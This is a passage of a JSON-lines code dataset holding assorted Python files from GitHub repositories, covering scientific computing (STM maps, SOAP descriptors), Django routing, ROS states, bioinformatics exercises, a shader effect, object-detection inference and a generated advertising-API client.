WFN LDOS\n + len(height_list) * len(self.p_tip_ratios) # p-type WFN ch-signals\n + len(isoval_list) * len(self.p_tip_ratios) # p-type WFN cc-signals\n + len(height_list) * 2*len(fwhm_list) * len(self.p_tip_ratios) # p-type ch sts & stm signals\n + len(isoval_list) * 2*len(fwhm_list) * len(self.p_tip_ratios) # p-type cc sts & stm signals\n )\n\n # Orbital series\n for i_spin in range(self.nspin):\n label = 's%d_orb' % i_spin\n\n self.series_output[label]['series_data'] = np.zeros(\n (number_of_series, n_orb, self.local_cell_n[0], self.local_cell_n[1]),\n dtype=self.cgo.dtype)\n\n i_series_counter = 0\n\n ### constant-height orbital series\n\n for i_h, h in enumerate(height_list):\n\n ## orbital wavefunction\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-height orbital',\n 'height': h,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n 
self.local_data_plane_above_atoms(self.local_orbitals[i_spin][i_mo], h)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n ## orbital ch-signal with the different tips\n for i_p, p_tip_ratio in enumerate(self.p_tip_ratios):\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-height orbital sts',\n 'height': h,\n 'p_tip_ratio': p_tip_ratio,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n s_p_data = self.s_p_type_signal(i_spin, i_mo, p_tip_ratio)\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n self.local_data_plane_above_atoms(s_p_data, h)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n ### constant-isovalue orbital series\n\n for i_isov, isov in enumerate(isoval_list):\n for i_p, p_tip_ratio in enumerate(self.p_tip_ratios):\n\n # series info\n self.series_output[label]['series_info'].append({\n 'type': 'const-isovalue orbital sts',\n 'isovalue': isov,\n 'p_tip_ratio': p_tip_ratio,\n })\n\n # series data\n i_orb_count = 0\n for i_mo in orb_indexes_wrt_data_start[i_spin]:\n i_isosurf = self._get_isosurf_indexes(\n self.s_p_type_signal(i_spin, i_mo, p_tip_ratio),\n isov, True\n )\n self.series_output[label]['series_data'][i_series_counter, i_orb_count, :, :] = (\n self._index_with_interpolation(i_isosurf, self.z_arr)\n )\n i_orb_count += 1\n i_series_counter += 1\n\n self.calculate_stm_maps(\n fwhm_list, isoval_list, height_list, ens_list[i_spin], series_name='s%d_orb'%i_spin, i_series_offset=i_series_counter\n )\n\n\n def collect_and_save_orb_maps(self, path = \"./orb.npz\"):\n\n self.collect_series_maps()\n \n if self.mpi_rank == 0:\n\n save_data = {\n 's0_orb_general_info': self.series_output['s0_orb']['general_info'],\n 's0_orb_series_info': self.series_output['s0_orb']['series_info'],\n 's0_orb_series_data': self.series_output['s0_orb']['series_data'].astype(np.float32),\n }\n\n ### ----------------\n ### Reduce filesize further by zero threshold\n zero_thresh = 1e-3\n self.apply_zero_threshold(save_data['s0_orb_series_data'], zero_thresh)\n ### ----------------\n\n # additionally add info\n save_data['s0_orb_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['s0_orb_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n\n if \"s1_orb\" in self.series_output:\n save_data['s1_orb_general_info'] = self.series_output['s1_orb']['general_info']\n save_data['s1_orb_series_info'] = self.series_output['s1_orb']['series_info']\n save_data['s1_orb_series_data'] = self.series_output['s1_orb']['series_data'].astype(np.float32)\n\n self.apply_zero_threshold(save_data['s1_orb_series_data'], zero_thresh)\n save_data['s1_orb_general_info']['x_arr'] = np.arange(0.0, self.cell_n[0]*self.dv[0] + self.dv[0]/2, self.dv[0]) + self.origin[0]\n save_data['s1_orb_general_info']['y_arr'] = np.arange(0.0, self.cell_n[1]*self.dv[1] + self.dv[1]/2, self.dv[1]) + self.origin[1]\n\n np.savez_compressed(path, **save_data)\n\n # Reset, otherwise can cause problems (more versatile to NOT reset, though)\n self.series_output = {}\n","repo_name":"nanotech-empa/cp2k-spm-tools","sub_path":"cp2k_spm_tools/cp2k_stm_sts.py","file_name":"cp2k_stm_sts.py","file_ext":"py","file_size_in_byte":29065,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} 
+{"seq_id":"35489663800","text":"#!/home/projects/ku_00039/people/zelili/programs/miniconda2/envs/phyluce-1.7.1/bin/python\nimport os\nimport sys\nimport csv\nimport numpy as np\nimport pandas as pd\n\nfolderpath = r\"/home/projects/ku_10024/people/zelili/berter/data/vecs\"\nfilepaths = [os.path.join(folderpath, name) for name in os.listdir(folderpath)]\n\ni = 0\nfor path in filepaths:\n if(len(path)>len('/home/projects/ku_10024/people/zelili/berter/data/vecs/abstracts_aa.vecs')):\n if(i%10==0 or i == 159):\n if(i != 0):\n print('save abstracts_'+str(i)+'.vecs')\n tmpdf.to_csv('/home/projects/ku_10024/people/zelili/berter/data/abstracts_'+str(i)+'.vecs', sep=\"\\t\")\n print('create new df from', i)\n tmpdf = pd.DataFrame(columns=['pmid', 'fasttext', 'biowordvec', 'bert', 'biobert'])\n vecs = pd.read_csv(path, index_col=0, sep='\\t')\n tmpdf = pd.concat([tmpdf, vecs])\n i = i + 1\n\n","repo_name":"lzlniu/abstracts_vecs","sub_path":"data/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40057114322","text":"from dscribe.descriptors import SOAP\nfrom ase.io import read\nimport numpy as np\nfrom sparse import save_npz\nimport os\n\n# Settings\nbasepath = os.getcwd() # base path where avg SOAP matrices will be stored\nsoap_params = {'rcut': 4.0, 'sigma': 0.1, 'nmax': 9, 'lmax': 9,\n\t\t\t 'rbf': 'gto', 'average': 'off', 'crossover': True}\nxyz_path = os.path.join('..','qmof-geometries.xyz') # appended XYZ of structures (length N)\nrefcodes_path = os.path.join('..','qmof-refcodes.csv') # refcode for each structure (length N)\n\n#---------------------------------------\n# Make folder if not present\nif not os.path.exists(os.path.join(basepath, 'soap_matrices')):\n\tos.mkdir(os.path.join(basepath, 'soap_matrices'))\n\n# Read in structures\nstructures = read(xyz_path, index=':')\n\n# Read in refcodes\nrefcodes = np.genfromtxt(refcodes_path, delimiter=',', dtype=str).tolist()\nif len(refcodes) != len(structures):\n\traise ValueError('Mismatch in refcodes and num. 
structures')\n\n# Get unique species\nspecies = []\nfor structure in structures:\n\tsyms = np.unique(structure.get_chemical_symbols())\n\tspecies.extend([sym for sym in syms if sym not in species])\nspecies.sort()\n\n# Initialize SOAP\nsoap = SOAP(\n\tspecies=species,\n\tperiodic=True,\n\tsigma=soap_params['sigma'],\n\trcut=soap_params['rcut'],\n\tnmax=soap_params['nmax'],\n\tlmax=soap_params['lmax'],\n\trbf=soap_params['rbf'],\n\taverage=soap_params['average'],\n\tcrossover=soap_params['crossover'],\n\tsparse=True\n)\n\n# Make SOAP fingerprints\nfor i, structure in enumerate(structures):\n\trefcode = refcodes[i]\n\tsoap_filename = os.path.join(\n\t\tbasepath, 'soap_matrices', 'soap_'+refcode+'.npz')\n\tif os.path.exists(soap_filename):\n\t\tcontinue\n\tsoap_matrix = soap.create(structure)\n\tsave_npz(soap_filename, soap_matrix)\n","repo_name":"arosen93/QMOF","sub_path":"machine_learning/soap_kernel/soap_matrix_generator.py","file_name":"soap_matrix_generator.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"61"} +{"seq_id":"38328568743","text":"from django.conf.urls import include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = [\n url(r'^', include('metroapp.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^i18n/', include('django.conf.urls.i18n')),\n]\n","repo_name":"tristanguigue/metro","sub_path":"conf/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"1283556614","text":"import http.server\nimport socketserver\n\nPORT = 8080\n\nclass MyHandler(http.server.BaseHTTPRequestHandler):\n def do_GET(self):\n self.send_response(200)\n self.send_header(\"Content-type\", \"text/html\")\n self.end_headers()\n self.wfile.write(b\"Title goes here.\")\n self.wfile.write(b\"
<body><h1>Hello World!</h1></body></html>
\")\ntry:\n server = http.server.HTTPServer(('', PORT), MyHandler)\n print('Started http server')\n server.serve_forever()\nexcept KeyboardInterrupt:\n print('^C received, shutting down server')\n server.socket.close()","repo_name":"m-adams/hellopython","sub_path":"helloworld.py","file_name":"helloworld.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4856309638","text":"from geometry_msgs.msg import Twist\nfrom smach import State\n\n\ndef check_if_twist_msg_is_zero(twist_msg, linear_threshold, angular_threshold):\n assert isinstance(twist_msg, Twist)\n if abs(twist_msg.linear.x) > linear_threshold:\n return False\n elif abs(twist_msg.linear.y) > linear_threshold:\n return False\n elif abs(twist_msg.linear.z) > linear_threshold:\n return False\n elif abs(twist_msg.angular.x) > angular_threshold:\n return False\n elif abs(twist_msg.angular.y) > angular_threshold:\n return False\n elif abs(twist_msg.angular.z) > angular_threshold:\n return False\n else:\n return True\n\n\nclass CheckIfTwistMsgIsZero(State):\n def __init__(self, lin_threshold, ang_threshold):\n \"\"\"SMACH State\n :type lin_threshold: float\n :param lin_threshold: Minimum absolute value for twist.linear.(x,y,z) value to be considered non-zero\n\n :type ang_threshold: float\n :param ang_threshold: Minimum absolute value for twist.angular.(x,y,z) value to be considered non-zero\n \"\"\"\n State.__init__(self, outcomes=['true', 'false'], input_keys=['twist_msg'])\n\n self.lin_threshold = lin_threshold\n self.ang_threshold = ang_threshold\n\n self.active = False\n\n def enter(self, ud):\n self.active = True\n\n def execute(self, ud):\n self.enter(ud)\n\n twist_msg = ud.twist_msg\n if check_if_twist_msg_is_zero(twist_msg, self.lin_threshold, self.ang_threshold):\n return self.exit(ud, 'true')\n else:\n return self.exit(ud, 'false')\n\n def exit(self, ud, outcome):\n self.active = False\n return outcome\n","repo_name":"metamorph-inc/hebi_hexapod","sub_path":"hebihexapod_description/src/common_states/check_if_twist_msg_is_zero.py","file_name":"check_if_twist_msg_is_zero.py","file_ext":"py","file_size_in_byte":1688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9996555381","text":"import IndhuGpay\r\n\r\nIndhu=IndhuGpay.GooglePay(\"Indhumathi22068@gmail.com.com\",\"6382656210\",\"Indhumathi\")\r\nIndhu.open_gpay()\r\nIndhu.mobile_verification()\r\nIndhu.emailid_verification()\r\nIndhu.name_verification()\r\nIndhu.otp_verification(15698,15698)\r\nIndhu.Bank_verification()\r\nIndhu.set_Pin(\"9876\")\r\nIndhu.Enter_your_Pin(3465,3465)\r\n\r\nclass Phone_pe(IndhuGpay.GooglePay): \r\n def __init__(slef,Email_ID,Phone_number,name):\r\n super().__init__(Email_ID,Phone_number,name)\r\n\r\n def open_phonepe(self):\r\n print(\"Phone pe\")\r\n \r\nThakur=Phone_pe(\"indhu@gmail.com\",\"9274683744\",\"Mathi\")\r\nThakur.open_phonepe()\r\nThakur.mobile_verification()\r\nThakur.name_verification()\r\nThakur.otp_verification(780965,780965)\r\nThakur.Bank_verification()\r\nThakur.set_Pin(\"653908\")\r\nThakur.Enter_your_Pin(3564,3564)\r\n\r\na={}\r\ncondition=[]\r\n \r\ngpay=[{\"name\":\"anu\",\"GpayNumber\":8738451827,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"}, \r\n {\"name\":\"akalya\",\"GpayNumber\":7305341565,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"},\r\n {\"name\":\"Zumana\",\"GpayNumber\":9812875432,\"Type\":\"personal\",\"Transaction 
Details\":\"Regular\"},\r\n {\"name\":\"Zahwah\",\"GpayNumber\":9791277389,\"Type\":\"personal\",\"Transaction Details\":\"Regular\"},]\r\ngpay.append(condition)\r\n\r\nprint(gpay)\r\n \r\n\r\n","repo_name":"disys-indhu/gpay","sub_path":"Gpay2.py","file_name":"Gpay2.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12880402163","text":"\"\"\"docstring\"\"\"\nfrom django.urls import path\nfrom . import views\n\napp_name = 'vnm'\nurlpatterns = [\n path('', views.index, name='index'),\n path('likes//', views.likes, name='likes'),\n path('article/create/', views.ArticleCreateView.as_view(), name=\"article_create\"),\n path('watchlist/register', views.WatchListRegister.as_view(), name=\"watchlist_register\")\n]\n","repo_name":"tdev1999/Portfolio","sub_path":"mysite/vietnam_research/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11883033487","text":"c = \"catsandog\"\n\n\nk = [\"cats\",\"dog\",\"sand\",\"and\",\"cat\"]\n\nf = None\nfor i in range(len(k)):\n # print(\"\".join(c.split(k[i]).pop()))\n f = \"\".join(c.split(k[i]).pop())\n print(f)\n\n# Check if of the elements in k is reused multiple times is in f\n# if f in k or f == \"\" :\n# print(\"True\")\n# else:\n# print(\"False\")\n\nif f in k or f == \"\" or list(set(f))[0] in k or f in [list(set(l))[0] for l in k]:\n print(\"True\")\nelse:\n print(\"False\")\n\n\n\n","repo_name":"DEVSOG12/ReproducibleTests","sub_path":"NPMTest/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6953506333","text":"# Locating Restriction Sites\n\nimport os\nimport sys\n\nfile = open(os.path.join(os.path.dirname(sys.argv[0]), 'rosalind_revp.txt'))\nlines = [line.rstrip('\\n') for line in file]\nlines.pop(0)\ndna = ''.join(lines)\n# dna = \"TCAATGCATGCGGGTCTATATGCAT\"\n\n# Create reverse complement of a DNA string\ndef reverse_complement(dna):\n reverse = dna[::-1]\n complement = \"\"\n for c in reverse:\n if c == \"A\":\n complement += \"T\"\n elif c == \"T\":\n complement += \"A\"\n elif c == \"C\":\n complement += \"G\"\n else:\n complement += \"C\"\n return complement\n\n# Palindrome\ndef palindrome_tester(dna):\n positions = []\n for i in range(0, len(dna)):\n # Range 4..12\n for x in range(12, 2, -2):\n strand = dna[i:i + x]\n length = len(strand)\n if length >= 4 and length % 2 == 0:\n prev = strand[0:int(length/2)]\n next = strand[int(length/2):]\n # print(prev + \" \" + next + \" \" + reverse_complement(next) + \" i:\" + str(i) + \" x:\" + str(x))\n if prev == reverse_complement(next):\n # print(prev + \" \" + reverse_complement(next) + \" i:\" + str(i + 1) + \" x:\" + str(x))\n positions.append([i + 1, length])\n break\n return positions\n\n# Find pos, length of reverse\npalindromes = palindrome_tester(dna)\nfor palindrome in palindromes:\n print(str(palindrome[0]) + \" \" + str(palindrome[1]))\n","repo_name":"sneakyweasel/DNA","sub_path":"REVP/REVP.py","file_name":"REVP.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37283186394","text":"def knapsack(wt, val, w, n):\n table = [[0 for x in range(w+1)] for x in range(n+1)]\n\n for i in range(1,n+1):\n for j in range(1,w+1):\n if wt[i-1] 
<= j:\n table[i][j] = max(\n val[i-1] + table[i-1][j-wt[i-1]],\n table[i-1][j]\n )\n else:\n table[i][j] = table[i-1][j]\n cap = w\n print(table[n][w])\n for i in range(n,0,-1):\n if table[i-1][cap] != table[i][cap]:\n items.append(wt[i-1])\n cap = cap - wt[i-1]\n\nval = [40, 100, 50, 60]\nwt = [20, 10, 40, 30]\nw = 60\nn = len(wt)\nitems = []\nknapsack(wt, val, w, n)\nprint(items)\n","repo_name":"malikamakker/DataStructures","sub_path":"dynamic programming/knapsack_print_items.py","file_name":"knapsack_print_items.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17989771955","text":"# AoC 2020 Day 20b\n\ndef load_data():\n tiles = {}\n with open('example.txt', 'r') as infile:\n d = infile.read()\n for t in d.split('\\n\\n'):\n tile = t.split('\\n')\n tilename = tile[0][5:-1]\n tilesize = len(tile[1])\n top = tile[1]\n bottom = tile[tilesize]\n left = ''.join([x[0] for x in tile[1:]])\n right = ''.join([x[tilesize-1] for x in tile[1:]])\n tiles[tilename] = [top, right, bottom, left]\n return tiles\n\ndef find_match(tiles, curr_tile, side):\n for tile, sides in tiles.items():\n if tile != curr_tile:\n for s in sides:\n if s == side or s[::-1] == side:\n return True\n return False \n\ndef strip_borders(tile):\n newtile = []\n for rownum, row in enumerate(tile):\n if rownum not in [0, len(tile)]:\n newtile.append([tile[1:-1]])\n return newtile\n\ndef rotate_tile(tile):\n return [''.join(x) for x in list(zip(*tile[::-1]))]\n\ndef find_corners(tiles):\n corner_ids = 1\n sidematches = {x: 0 for x in tiles.keys()}\n\n for curr_tile, sides in tiles.items():\n for side in sides:\n if find_match(tiles, curr_tile, side):\n sidematches[curr_tile] += 1\n \n for k, v in sidematches.items():\n if v == 2:\n corner_ids *= int(k)\n return corner_ids\n\ndef main():\n test = ['#..', '...', '...']\n print(rotate_tile(test))\n #print(find_corners(load_data()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"Azcobu/advent-of-code","sub_path":"2020/day20/aoc2020-20b.py","file_name":"aoc2020-20b.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36478413707","text":"# Pytorch\nimport torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom torchvision import models\n\nimport pytorch_lightning as pl\nimport torchmetrics\n\n\nclass WoodLightningModule(pl.LightningModule):\n def __init__(self, model, num_classes, learning_rate=2 * 1e-4, use_pretrained=False, **kwargs):\n super().__init__()\n self.save_hyperparameters()\n self.learning_rate = learning_rate\n self.num_classes = num_classes\n self.use_pretrained = use_pretrained\n if use_pretrained:\n self.model = self.pretrained_model()\n else:\n self.model = model\n\n def pretrained_model(self):\n net_pretrained = models.resnet34(pretrained=True)\n # zamrożenie parametrów sieci\n for param in net_pretrained.parameters():\n param.requires_grad = False\n num_in_features = net_pretrained.fc.in_features # liczba cech wejściowych się nie zmienia, natomiast liczbę cech wyjściowych podmienimy na num_classes = 2\n net_pretrained.fc = nn.Linear(num_in_features,\n self.num_classes) # nadpisanie warstwy fc nową warstwą - w tym przykładzie tylko ta byłaby trenowana\n return net_pretrained\n\n def forward(self, x):\n return self.model(x)\n\n def compute_loss(self, x, y):\n return F.cross_entropy(x, y)\n\n def common_step(self, batch, batch_idx):\n x, y 
= batch\n outputs = self(x)\n loss = self.compute_loss(outputs, y)\n return loss, outputs, y\n\n def common_test_valid_step(self, batch, batch_idx):\n loss, outputs, y = self.common_step(batch, batch_idx)\n preds = torch.argmax(outputs, dim=1)\n acc = torchmetrics.functional.accuracy(preds, y, task=\"multiclass\", num_classes=self.num_classes)\n return loss, acc\n\n def training_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('train_loss', loss, on_step=True, on_epoch=True, logger=True)\n self.log('train_acc', acc, on_step=True, on_epoch=True, logger=True)\n return loss\n\n def validation_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('val_loss', loss, prog_bar=True)\n self.log('val_acc', acc, prog_bar=True)\n return loss\n\n def test_step(self, batch, batch_idx):\n loss, acc = self.common_test_valid_step(batch, batch_idx)\n self.log('test_loss', loss, prog_bar=True)\n self.log('test_acc', acc, prog_bar=True)\n return loss\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.parameters(), lr=self.learning_rate)\n return optimizer\n","repo_name":"Mikboch/wood-classification-DNN","sub_path":"src/wood-classification/modules/wood_lightning_module.py","file_name":"wood_lightning_module.py","file_ext":"py","file_size_in_byte":2730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23421409321","text":"fl=file(\"B-large.in\",\"r\")\r\nfo=file(\"output.txt\",\"w\")\r\nt=int(fl.readline())\r\nfor i in xrange(t):\r\n s=fl.readline()\r\n c,f,x=map(float,s.split())\r\n time=0.0000000\r\n rate=2\r\n while True:\r\n if x/rate 0.0 else 0.0\n max = max if max > 0.0 else 0.0\n steps = steps if steps > 0.0 else 0.0\n if min > max: min = max\n \n self._stepf_min = min \n self._stepf_max = max\n self._stepf_steps = steps\n self.toon_render.setShaderInput('min', Vec4(self._stepf_min))\n self.toon_render.setShaderInput('max', Vec4(self._stepf_max))\n self.toon_render.setShaderInput('steps', Vec4(self._stepf_steps))\n\n def enable(self):\n \"\"\"Enable the cartoon painter.\"\"\"\n if self._shaders_supported:\n self._enabled = True\n \n def disable(self):\n \"\"\"Disable the cartoon painter. It will not undo nodepaths already\n painted.\n \"\"\"\n self._enabled = False\n \n def paint(self, nodepath):\n \"\"\"Paint a nodepath with cartoon shading and inking.\"\"\"\n if self._enabled:\n _inp = nodepath.instanceUnderNode(self.toon_render, nodepath.getName())\n _inp.setTag(self.CARTOON_SHADING_TAG, 'True')\n _inp.setTag(self.CARTOON_INKING_TAG, 'True')\n self._paintings[nodepath] = _inp\n nodepath.stash()\n \n def unpaint(self, nodepath):\n \"\"\"Undo cartoon painting on a nodepath.\"\"\"\n if self._enabled:\n if nodepath in self._paintings:\n _inp = self._paintings.pop(nodepath)\n _inp.removeNode()\n nodepath.unstash()\n \n def camera_spot_light(self, bool):\n \"\"\"Enable or disable camera spot light effect. 
When enabled the shader\n light will follow the camera movements.\n \"\"\"\n self._camera_spot_light = bool\n \n separation = property(get_separation, set_separation)\n cutoff = property(get_cutoff, set_cutoff)","repo_name":"cla101/Cartoon-Painter","sub_path":"cartoonpainter/cartoonpainter.py","file_name":"cartoonpainter.py","file_ext":"py","file_size_in_byte":11433,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"29326478491","text":"from fastai.vision import *\nfrom helper.object_detection_helper import *\nfrom loss.RetinaNetFocalLoss import RetinaNetFocalLoss\nfrom models.RetinaNet import RetinaNet\nimport locale\n\nlocale.setlocale(locale.LC_ALL, 'C')\nimport numpy as np\nimport torch\nimport torchvision.models as models\nimport torchvision\n\nclass ModelLoader:\n def __init__(self):\n anchor_sizes = [(32, 32), (16, 16)]\n anchor_ratios = [1.4, 1.2, 1, 0.8, 0.6]\n anchor_scales = [0.3, 0.4, 0.6, 0.8, 1, 1.2]\n n_anch = len(anchor_ratios) * len(anchor_scales)\n anchors = create_anchors(sizes=anchor_sizes, ratios=anchor_ratios, scales=anchor_scales)\n\n n_classes = 2\n crit = RetinaNetFocalLoss(anchors)\n encoder = create_body(models.resnet18, True, -2)\n self.model = RetinaNet(encoder, n_classes=n_classes, n_anchors=n_anch, sizes=[32, 16], chs=32, final_bias=-4.,\n n_conv=2)\n state_dic = torch.load('./round2_pretraining2.pth', map_location=torch.device('cpu'))\n self.model.load_state_dict(state_dic['model'])\n self.model.eval()\n\n def infer(self, image, context, detect_thresh: float = 0.2, nms_thresh: float = 0.3):\n anchor_sizes = [(32, 32), (16, 16)]\n anchor_ratios = [1.4, 1.2, 1, 0.8, 0.6]\n anchor_scales = [0.3, 0.4, 0.6, 0.8, 1, 1.2]\n n_anch = len(anchor_ratios) * len(anchor_scales)\n anchors = create_anchors(sizes=anchor_sizes, ratios=anchor_ratios, scales=anchor_scales)\n\n with torch.no_grad():\n context.logger.info(f\"Input image: {image.size()}\")\n in_img = torch.load('./tensor.pt')\n context.logger.info(f\"in_img size: {in_img.size()}\")\n context.logger.info(f\"in_img: {in_img}\")\n\n context.logger.info(f\"image size: {image.size()}\")\n context.logger.info(f\"image: {image}\")\n\n test_prediction = self.model(image)\n class_pred_im, bbox_pred_im = test_prediction[:2]\n context.logger.info(f\"Prediction output: {len(bbox_pred_im)}\")\n\n context.logger.info(f\"Starting process_output2\")\n bbox_pred, scores, preds, detect_count = self.process_output2(\n clas_pred=class_pred_im,\n bbox_pred=bbox_pred_im,\n anchors=anchors)\n context.logger.info(f\"detect_count: {len(detect_count)}\")\n bbox_preds = []\n start = 0\n for i in detect_count:\n bbox_pred_i = bbox_pred[start:start + i]\n scores_i = scores[start:start + i]\n preds_i = preds[start:start + i]\n bbox_preds.append(self.filter_slices(bbox_pred_i, scores_i, preds_i, nms_thresh, context))\n start += i\n context.logger.info(f\"return bbox_preds: {len(bbox_preds)}\")\n return bbox_preds\n\n def process_output2(self, clas_pred, bbox_pred, anchors):\n detect_thresh = 0.25\n bbox_pred = activ_to_bbox(bbox_pred, anchors)\n clas_pred = torch.sigmoid(clas_pred)\n detect_mask = clas_pred.max(2)[0] > detect_thresh\n detect_count = torch.sum(detect_mask, 1)\n\n if np.array(detect_mask).max() == 0:\n return None, None, None\n\n bbox_pred, clas_pred = bbox_pred[detect_mask], clas_pred[detect_mask]\n\n bbox_pred = tlbr2cthw(torch.clamp(cthw2tlbr(bbox_pred), min=-1, max=1))\n\n scores, preds = clas_pred.max(1)\n\n return bbox_pred, scores, preds, detect_count\n\n def 
filter_slices(self, bbox_pred, scores, preds, nms_thresh, context):\n if bbox_pred is not None:\n to_keep = nms(bbox_pred, scores, context=context, thresh=nms_thresh)\n #to_keep = torchvision.ops.nms(bbox_pred, scores, nms_thresh)\n\n bbox_pred, preds, scores = bbox_pred[to_keep].cpu(), preds[to_keep].cpu(), scores[to_keep].cpu()\n t_sz = torch.Tensor([256, 256])[None].cpu()\n if bbox_pred is not None:\n bbox_pred = to_np(rescale_boxes(bbox_pred, t_sz))\n # change from center to top left\n bbox_pred[:, :2] = bbox_pred[:, :2] - bbox_pred[:, 2:] / 2\n\n return bbox_pred\n","repo_name":"symbols-and-patterns/medieval-texts-detection-cvat-plugin","sub_path":"pismena/nuclio/model_loader.py","file_name":"model_loader.py","file_ext":"py","file_size_in_byte":4161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24017548297","text":"from ..core import Feature, TextEngine\nfrom ..internal import chelly_property, ChellyFollowedValue\nfrom qtpy.QtGui import QImage, QPainter\nfrom qtpy.QtCore import QPoint, QSize\nfrom typing import Any, Optional\nfrom typing_extensions import Self\n\n\nclass ImageDrawer(Feature):\n def __init__(self, editor):\n super().__init__(editor)\n self.__qimage_to_paint = None\n self.editor.on_painted.connect(self.paint)\n\n def paint(self, paint_event):\n if not isinstance(self.__qimage_to_paint, QImage):\n return None\n\n with QPainter(self.editor.viewport()) as painter:\n x_offset = self.editor.contentOffset().x()\n viewport_size = self.editor.viewport().size()\n drawable_x = viewport_size.width() - x_offset\n drawable_y = viewport_size.height()\n\n painter.drawImage(\n QPoint(0, 0),\n self.__qimage_to_paint.scaled(QSize(drawable_x, drawable_y)),\n )\n\n @chelly_property\n def draw(self) -> Optional[QImage]:\n return self.__qimage_to_paint\n\n @draw.setter\n def draw(self, qimage: Optional[QImage]):\n self.__qimage_to_paint = qimage\n\n @draw.deleter\n def draw(self):\n self.__qimage_to_paint = None\n\n @draw.follower\n def draw(self, origin: Self, value: Any):\n for editor in self.editor.followers:\n editor_follower_image_drawer = editor.features.get(ImageDrawer)\n if editor_follower_image_drawer is None:\n continue\n editor_follower_image_drawer.draw = ChellyFollowedValue(value)\n\n\n__all__ = [\"ImageDrawer\"]\n","repo_name":"IgdaliasCabamba/chelly","sub_path":"chelly/features/drawer.py","file_name":"drawer.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"39403293818","text":"# coding: utf-8\n\n\"\"\"\n Yahoo!広告 検索広告 API リファレンス / Yahoo! Ads Search Ads API Reference\n\n
Yahoo!広告 検索広告 APIのWebサービスについて説明します。 「Try it out」のご利用には、事前にアプリケーションの登録が必要です。また、アプリケーションのリダイレクトURIの1つにhttps://yahoojp-marketing.github.io/ads-search-api-documents/oauth2-redirect.htmlを登録してください。 Search Ads API Web Services supported in Yahoo! Ads API. When you use \\\"Try it out\\\", you need to register your application in advance. As one of redirect URI for application, you need to set \\\"https://yahoojp-marketing.github.io/ads-search-api-documents/oauth2-redirect.html\\\".
# noqa: E501\n\n The version of the OpenAPI document: v1\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom yahoo_ads_search.configuration import Configuration\n\n\nclass FeedItem(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'account_id': 'int',\n 'approval_status': 'FeedItemServiceApprovalStatus',\n 'custom_parameters': 'FeedItemServiceCustomParameters',\n 'device_preference': 'FeedItemServiceDevicePreference',\n 'disapproval_reason_codes': 'list[str]',\n 'end_date': 'str',\n 'feed_id': 'int',\n 'feed_item_attribute': 'list[FeedItemServiceAttribute]',\n 'feed_item_id': 'int',\n 'feed_item_track_id': 'int',\n 'invalided_trademarks': 